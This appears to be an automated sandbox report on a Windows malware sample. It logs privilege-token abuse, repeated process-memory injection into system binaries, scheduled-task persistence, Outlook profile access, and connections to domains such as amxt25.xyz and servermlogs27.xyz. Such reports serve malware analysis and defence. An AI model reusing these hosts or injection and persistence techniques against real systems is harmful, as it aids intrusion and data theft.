N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\344B.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2196 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Users\Admin\AppData\Local\Temp\rh111.exe
PID 2556 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 2556 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 2556 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 2556 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 2556 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 2556 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\rh111.exe C:\Windows\system32\certreq.exe
PID 2920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe
PID 2920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe
PID 2920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe
PID 2920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe
PID 2920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 2552 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe
PID 1264 wrote to memory of 1192 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1264 wrote to memory of 1192 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1264 wrote to memory of 1192 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1264 wrote to memory of 1192 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1192 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Users\Admin\AppData\Local\Temp\2D96.exe
PID 1264 wrote to memory of 1364 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\344B.exe
PID 1264 wrote to memory of 1364 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\344B.exe
PID 1264 wrote to memory of 1364 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\344B.exe
PID 1264 wrote to memory of 1364 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\344B.exe
PID 1616 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Windows\SysWOW64\WerFault.exe
PID 1616 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Windows\SysWOW64\WerFault.exe
PID 1616 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Windows\SysWOW64\WerFault.exe
PID 1616 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\2D96.exe C:\Windows\SysWOW64\WerFault.exe
PID 1364 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\344B.exe C:\Users\Admin\AppData\Local\Temp\344B.exe
PID 1364 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\344B.exe C:\Users\Admin\AppData\Local\Temp\344B.exe
PID 1364 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\344B.exe C:\Users\Admin\AppData\Local\Temp\344B.exe
PID 1364 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\344B.exe C:\Users\Admin\AppData\Local\Temp\344B.exe
PID 1364 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\344B.exe C:\Users\Admin\AppData\Local\Temp\344B.exe
PID 1264 wrote to memory of 2352 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1264 wrote to memory of 2352 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1264 wrote to memory of 2352 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1264 wrote to memory of 2352 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1264 wrote to memory of 2352 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1364 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\344B.exe C:\Users\Admin\AppData\Local\Temp\344B.exe
PID 1364 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\344B.exe C:\Users\Admin\AppData\Local\Temp\344B.exe
PID 1364 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\344B.exe C:\Users\Admin\AppData\Local\Temp\344B.exe
PID 1364 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\344B.exe C:\Users\Admin\AppData\Local\Temp\344B.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\rh111.exe

"C:\Users\Admin\AppData\Local\Temp\rh111.exe"

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Users\Admin\AppData\Local\Temp\rh111.exe

C:\Windows\system32\certreq.exe

"C:\Windows\system32\certreq.exe"

C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe

"C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe"

C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe

C:\Users\Admin\AppData\Local\Microsoft\2%r2R.exe

C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe

"C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe"

C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe

C:\Users\Admin\AppData\Local\Microsoft\3r7[o7V`VR.exe

C:\Users\Admin\AppData\Local\Temp\2D96.exe

C:\Users\Admin\AppData\Local\Temp\2D96.exe

C:\Users\Admin\AppData\Local\Temp\2D96.exe

C:\Users\Admin\AppData\Local\Temp\2D96.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 164

C:\Users\Admin\AppData\Local\Temp\344B.exe

C:\Users\Admin\AppData\Local\Temp\344B.exe

C:\Users\Admin\AppData\Local\Temp\344B.exe

"C:\Users\Admin\AppData\Local\Temp\344B.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\8759.tmp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\8759.tmp\svchost.exe -debug

C:\Windows\system32\taskeng.exe

taskeng.exe {273928B8-2350-4128-BD86-7CE07C3254BF} S-1-5-21-3849525425-30183055-657688904-1000:KGPMNUDG\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\rwjhbdb

C:\Users\Admin\AppData\Roaming\rwjhbdb

C:\Windows\SysWOW64\ctfmon.exe

ctfmon.exe

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\8759.tmp\aa_nts.dll",run

Network

Country Destination Domain Proto
US 8.8.8.8:53 amxt25.xyz udp
DE 45.131.66.61:80 amxt25.xyz tcp
DE 45.131.66.61:80 amxt25.xyz tcp
DE 45.131.66.61:80 amxt25.xyz tcp
US 8.8.8.8:53 servermlogs27.xyz udp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 xemtex534.xyz udp
DE 212.87.212.222:80 xemtex534.xyz tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.70:80 apps.identrust.com tcp
US 8.8.8.8:53 cdn1.frocdn.ch udp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
NL 204.10.194.180:443 cdn1.frocdn.ch tcp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
DE 136.243.104.242:443 tcp
DE 45.131.66.120:80 servermlogs27.xyz tcp
US 8.8.8.8:53 www.ammyy.com udp
DE 136.243.18.118:80 www.ammyy.com tcp
DE 136.243.18.118:443 www.ammyy.com tcp

Files
